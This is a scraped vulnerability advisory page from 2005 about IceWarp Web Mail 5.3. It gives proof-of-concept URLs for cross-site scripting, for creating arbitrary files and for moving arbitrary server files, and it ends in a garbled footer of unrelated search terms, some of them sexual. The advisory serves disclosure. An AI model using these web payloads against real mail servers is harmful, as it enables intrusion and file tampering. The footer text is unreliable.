exploits , vulnerabilities , articles , IceWarp Web Mail Multiple Remote Vulnerabilities
| Title |
IceWarp Web Mail Multiple Remote Vulnerabilities |
| Published |
2005-01-28-12:00AM |
| Updated |
2005-02-03-05:03PM |
| Class |
Access Validation Error |
| CVE |
CVE-MAP-NOMATCH |
| Remote |
Yes |
| Local |
No |
| Credit |
ShineShadow <ss_contacts@hotmail.com> is credited with the disclosure of these issues. |
| Vulnerable |
IceWarp Web Mail 5.3 |
| Not Vulnerable |
IceWarp Web Mail 5.4
IceWarp Web Mail 5.3.2
IceWarp Web Mail 5.3.1 |
| Code |
No exploits are required to leverage these issues. The following proof of concepts have been provided:
To carry out cross-site scripting attacks: http://www.example.com:32000/mail/login.html?username=[xss_here] http://www.example.com/mail/accountsettings_add.html?id=[]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[xss_here]
To create a file with arbitrary contents on an affected computer: http://www.example.com:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accontid=[arbitary_text]
To move an arbitrary file to an attacker's folder: http://localhost:32000/importaction.html?id=[sessionid]&importfile=[arbitrary_path]&action=upload&Import=1&importfile_size=1000000
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Fri, 04 Dec 2009 09:46:48 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sania boob mom+son+se www.289499 news for c Free arabi TYPO3 3.8 Apache htt Srilankans xxx 3gp www.868.nm pc533.com HOT SXEY Foto Bugil www.zizval Indian mov modules%2F xx sex vid php 1.9.ht Mayang sar WWW.18To19 ShaMAN bike /search/ex www.adults FLEXnet sexy woman www.tamil porn shema TUEB8,COM Login to C Sex lk PHP Advanc Asiasp wwe griles 200 /compo Sex com news for c php advanc pmafind www.bluapp Sexymaduri www.ruanji ARIFUL ssh exploi actores blackwomen SEXEY+WALL Sex com mightypote OpenSSH_4.
|